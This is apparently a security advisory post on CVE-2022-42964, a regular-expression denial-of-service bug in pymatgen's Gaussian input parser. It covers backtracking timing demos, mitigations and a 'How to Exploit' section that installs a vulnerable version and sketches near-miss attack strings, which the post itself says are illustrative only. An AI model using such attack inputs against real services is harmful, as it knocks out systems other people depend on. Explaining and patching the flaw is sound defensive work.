Summary:  
In October 2022, a vulnerability (CVE-2022-42964) was identified in pymatgen, a popular Python package for materials analysis. An attacker who can pass arbitrary input to the GaussianInput.from_string method can cause a Regular Expression Denial of Service (ReDoS): the method parses its input with a regular expression that is prone to exponential-time backtracking. This post breaks down the bug, how it can be triggered, proof-of-concept code, and how to protect applications that use pymatgen.

What is pymatgen?

pymatgen (Python Materials Genomics) is a robust, widely used open-source library for materials analysis. It is used in chemistry, physics, and materials science to work with various file formats, including those for Gaussian, an electronic structure modeling program.

Vulnerability Type: Exponential ReDoS (Regular Expression Denial of Service)

- How It Happens: The method uses a vulnerable regular expression to parse Gaussian input files. A specially crafted input can make regex processing extremely slow, taking seconds or minutes for a single request.
- Danger: If your app exposes this parsing to end users, an attacker can hang your server or service by submitting malicious input.

The vulnerable function is GaussianInput.from_string:

from pymatgen.io.gaussian import GaussianInput

# Do NOT call this on untrusted input in affected versions!
inp = GaussianInput.from_string("...attacker controlled content...")

Within from_string, the input is matched against a regex like the following (simplified for clarity):

re.search(r"^[\s\S]*(.*?)\n", s, re.MULTILINE)

(The actual regex is larger. Simplified forms such as r"^\s*(.*?)\s*$" are used in this post only to show the shape of the problem: several quantifiers that can all match the same characters.)

Why this pattern is dangerous

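Certain regexes are prone to catastrophic backtracking, especially ones where a quantified group is itself quantified, as in (\w+)*, or where several *, +, and ? quantifiers in close succession can match the same characters. If an attacker supplies a string that almost matches but doesn't, the engine tries every possible way of dividing the input among those quantifiers before giving up. With nested quantifiers the number of attempts roughly doubles with each extra character, which is what makes the running time exponential.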
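To make the effect concrete, here is a minimal sketch using Python's standard re module. The two patterns are illustrative assumptions chosen to show nested versus flat quantifiers; neither is claimed to be the regex inside pymatgen. Both accept the same strings, but only the nested one backtracks exponentially on a near miss.

```python
import re
import time

# Illustrative patterns only; neither is claimed to be pymatgen's actual regex.
NESTED = re.compile(r"^(\w+)*$")  # a quantified group inside another quantifier
FLAT = re.compile(r"^\w*$")       # accepts the same strings without nesting


def time_match(pattern: re.Pattern, text: str) -> float:
    """Return the seconds spent on a single match attempt."""
    start = time.perf_counter()
    pattern.match(text)
    return time.perf_counter() - start


def compare(lengths=(8, 12, 16, 20)):
    """Time both patterns on near-miss inputs of growing length."""
    rows = []
    for n in lengths:
        near_miss = "a" * n + "!"  # the trailing "!" forces the match to fail
        rows.append((n, time_match(NESTED, near_miss), time_match(FLAT, near_miss)))
    return rows


if __name__ == "__main__":
    for n, nested_s, flat_s in compare():
        print(f"n={n:2d}  nested={nested_s:.6f}s  flat={flat_s:.6f}s")
```

On a typical machine the nested column grows by a large factor every few characters while the flat column stays near zero. Keep the lengths small when experimenting: a few extra characters can turn a fraction of a second into minutes.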

How to Exploit

Here’s a minimal example of an attack exploiting this bug.

Step 1: Install vulnerable pymatgen

pip install 'pymatgen<2022.10.14'  # Affected versions (for demo use only)

Step 2: Create Malicious Input

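Suppose the regex tries to match a line like this (simplified for demo): ^\s*(.*?)\s*$

A benign input that matches quickly looks like this:

benign = " " * 10000 + "A" * 100 + "\n"

An attack string instead aims for a near miss, so the engine keeps retrying different ways of splitting the same characters between quantifiers:

evil = " " * 10000 + "!"  # Long ambiguous run, then a character meant to break the match.

A classic ReDoS string pairs a run the pattern can split in many ways with trailing characters that make the overall match fail:

evil = " " * 30 + "!" * 30  # (Real attack strings can be much longer)
# In actual exploits, the string is tailored to the exact pattern in the affected release.

Note that the simplified pattern above is not exponential by itself, because its quantifiers are adjacent rather than nested. These strings only illustrate the shape of an attack; a working exploit has to target the real pattern inside from_string.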

Step 3: Trigger the ReDoS

import time
from pymatgen.io.gaussian import GaussianInput

# `evil` is the attack string built in Step 2.
start = time.perf_counter()
try:
    GaussianInput.from_string(evil)
except Exception as e:
    print(f"Exception: {e}")
print(f"Processed in: {time.perf_counter() - start:.2f} seconds")

With an attack string (evil) tailored to the vulnerable pattern, the call freezes for seconds or minutes before it fails, and the delay grows rapidly as the string gets longer.

See It in Action

- Public NVD Record: CVE-2022-42964
- GitHub Advisory: GHSA-rm53-7xfw-9xg8

Practical Impact

- Denial of Service: Attackers can send special Gaussian files to crash or freeze your web app or API if it parses arbitrary user uploads with pymatgen.
- Low Difficulty: Little skill is required to exploit the bug if the attacker can control the input.
- Surface Area: Any system that accepts untrusted Gaussian file inputs or text strings and calls from_string on them.

How to Protect Your Application

1. Upgrade

The issue is fixed in v2022.10.14 and later.

pip install --upgrade 'pymatgen>=2022.10.14'

Check your version

import pymatgen
print(pymatgen.__version__)
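If you want to automate that check, for example in a startup script, the comparison can be sketched as below. The helper names parse_version and is_patched are hypothetical, and the threshold is simply the fixed version quoted in this post; the sketch assumes pymatgen's date-style version strings such as 2022.10.14.

```python
from importlib.metadata import PackageNotFoundError, version

FIXED_IN = (2022, 10, 14)  # fixed version as quoted in this post


def parse_version(text: str) -> tuple:
    """Turn '2022.10.14' into (2022, 10, 14), stopping at the first non-numeric part."""
    parts = []
    for piece in text.split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    return tuple(parts)


def is_patched(text: str) -> bool:
    """Return True if the version string is at or above the fixed release."""
    return parse_version(text) >= FIXED_IN


if __name__ == "__main__":
    try:
        installed = version("pymatgen")
        print(installed, "patched" if is_patched(installed) else "VULNERABLE")
    except PackageNotFoundError:
        print("pymatgen is not installed")
```

Comparing tuples of integers avoids the string-comparison trap where "2022.9.21" would sort after "2022.10.14".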

2. Input Filtering

If you can’t upgrade yet, avoid passing untrusted input to GaussianInput.from_string. Consider validating input before parsing.
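One possible form of such validation is a size and character check before the text reaches the parser. The sketch below is an assumption, not part of pymatgen: the function name check_gaussian_text and both limits are hypothetical and should be tuned to the files you actually expect. Length caps only shrink the attack surface, since an exponential pattern can stall on fairly short lines, so treat this as a stopgap rather than a fix.

```python
MAX_TOTAL_CHARS = 100_000  # hypothetical cap on the whole input
MAX_LINE_CHARS = 200       # hypothetical cap on any single line


def check_gaussian_text(text: str) -> None:
    """Raise ValueError if the text breaks the size or character limits."""
    if len(text) > MAX_TOTAL_CHARS:
        raise ValueError(f"input too large: {len(text)} characters")
    for number, line in enumerate(text.splitlines(), start=1):
        if len(line) > MAX_LINE_CHARS:
            raise ValueError(f"line {number} too long: {len(line)} characters")
        # Reject control characters other than tab.
        if any(ch != "\t" and not ch.isprintable() for ch in line):
            raise ValueError(f"line {number} contains control characters")


if __name__ == "__main__":
    sample = "#P HF/6-31G(d)\n\nH2\n\n0 1\nH 0.0 0.0 0.0\nH 0.0 0.0 0.74\n"
    check_gaussian_text(sample)  # passes silently
    print("sample accepted")
```

Call check_gaussian_text on the untrusted text first and only hand it to GaussianInput.from_string if no exception is raised.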

3. Timeouts

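Run the parsing in a separate process with a timeout, if possible (e.g. using multiprocessing), so that a parse stuck in backtracking can be killed instead of hanging the service. A thread is not enough for this, because Python cannot forcibly stop a running thread.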
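A minimal sketch of the process-based approach follows. It uses the standard subprocess module rather than multiprocessing, because subprocess.run has a built-in timeout that kills the child. The helper name run_with_timeout and the PARSE_SNIPPET child script are hypothetical, and the snippet assumes pymatgen is installed in the same interpreter.

```python
import subprocess
import sys
from typing import Optional

# Hypothetical child script: reads Gaussian input text from stdin and parses it.
PARSE_SNIPPET = (
    "import sys\n"
    "from pymatgen.io.gaussian import GaussianInput\n"
    "GaussianInput.from_string(sys.stdin.read())\n"
    "print('ok')\n"
)


def run_with_timeout(code: str, stdin_text: str, timeout_s: float) -> Optional[str]:
    """Run `code` in a fresh Python process; return its stdout, or None on timeout."""
    try:
        done = subprocess.run(
            [sys.executable, "-c", code],
            input=stdin_text,
            capture_output=True,
            text=True,
            timeout=timeout_s,  # the child is killed when this expires
        )
    except subprocess.TimeoutExpired:
        return None
    return done.stdout
```

A call such as run_with_timeout(PARSE_SNIPPET, untrusted_text, timeout_s=5.0) returns None when the parse exceeds five seconds. An empty string means the child exited without printing, for example because parsing raised an exception. Starting a new interpreter per request is slow, so this suits low-volume upload handlers better than hot paths.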

References

- pymatgen Security Advisory
- CVE-2022-42964 at NVD
- PyPI pymatgen releases
- Understanding ReDoS

Final Thoughts

Regular expression engines are powerful, but easy to misuse: always beware when parsing user-supplied data! If your code parses chemistry files or any files from users, validate and upgrade your libraries.

For pymatgen, CVE-2022-42964 is more than a technical footnote—it’s a reminder to always keep dependencies updated and review all code relating to user-supplied input.

Timeline

Published on: 11/09/2022 20:15:00 UTC
Last modified on: 11/10/2022 14:29:00 UTC